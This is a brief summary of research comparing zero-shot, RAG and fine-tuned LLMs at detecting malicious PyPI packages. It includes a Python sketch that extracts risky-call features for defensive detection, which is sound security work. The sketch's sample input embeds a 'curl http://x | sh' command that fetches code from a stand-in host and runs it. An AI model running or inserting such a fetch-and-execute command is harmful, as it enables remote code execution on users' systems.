Can LLMs Detect Malicious PyPI Packages Better with RAG?
Over 1,200 malicious Python packages were evaluated using three approaches:
– Zero-shot LLM prompts (no prior examples; see the prompt sketch after this list)
– Retrieval-Augmented Generation (RAG) with threat intelligence
– Fine-tuned LLMs on labeled malicious behavior patterns
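For a concrete picture of the first setup, zero-shot here means a single classification instruction with no examples and no retrieved context. The wording and helper below are a sketch, not the paper's actual prompt:

```python
# Illustrative zero-shot prompt: no few-shot examples, no retrieved
# threat intel. The exact wording is an assumption, not the paper's.
ZERO_SHOT_PROMPT = """\
You are a security analyst reviewing a PyPI package for malicious behavior
(e.g., credential theft, remote code execution, data exfiltration).

Classify the package as MALICIOUS or BENIGN and give a one-line reason.

Package source:
{source}
"""

def build_prompt(source: str) -> str:
    # Truncate long sources to fit a typical context window (size is arbitrary here).
    return ZERO_SHOT_PROMPT.format(source=source[:8000])
```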
RAG underperformed across the board: even when augmented with YARA rules, GitHub Advisories, and known malware code snippets, it failed to meaningfully improve detection in any setup.
In contrast, a LLaMA-3.1-8B model fine-tuned on behavior-based features (e.g., calls to os.system, subprocess.Popen, and eval) reached 97% accuracy and 95% balanced accuracy, outperforming both the zero-shot and RAG approaches.
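Those behavior-based features imply a static-analysis step before fine-tuning: walk each file's AST and count risky call sites. A minimal sketch, assuming the features are simple presence counts of those calls (function and feature names here are illustrative, not the paper's exact pipeline):

```python
# Sketch: count risky call sites in a package's Python source via the AST.
import ast

RISKY_CALLS = {"eval", "exec", "compile"}
RISKY_ATTRS = {("os", "system"), ("subprocess", "Popen"), ("subprocess", "run")}

def extract_features(source: str) -> dict[str, int]:
    """Return counts of suspicious call sites found in the source."""
    counts: dict[str, int] = {}
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return counts  # obfuscated/non-parseable files need other handling
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func, name = node.func, None
        if isinstance(func, ast.Name) and func.id in RISKY_CALLS:
            name = func.id  # bare call like eval(...)
        elif (isinstance(func, ast.Attribute)
              and isinstance(func.value, ast.Name)
              and (func.value.id, func.attr) in RISKY_ATTRS):
            name = f"{func.value.id}.{func.attr}"  # e.g. os.system(...)
        if name:
            counts[name] = counts.get(name, 0) + 1
    return counts

# Example: flags both os.system and eval without executing anything.
print(extract_features("import os\nos.system('curl http://x | sh')\neval(x)"))
```

Counting call sites rather than raw string matches avoids false hits on comments and string literals, though a real pipeline would also have to handle obfuscation (base64 payloads, getattr tricks) that never parses to a direct call.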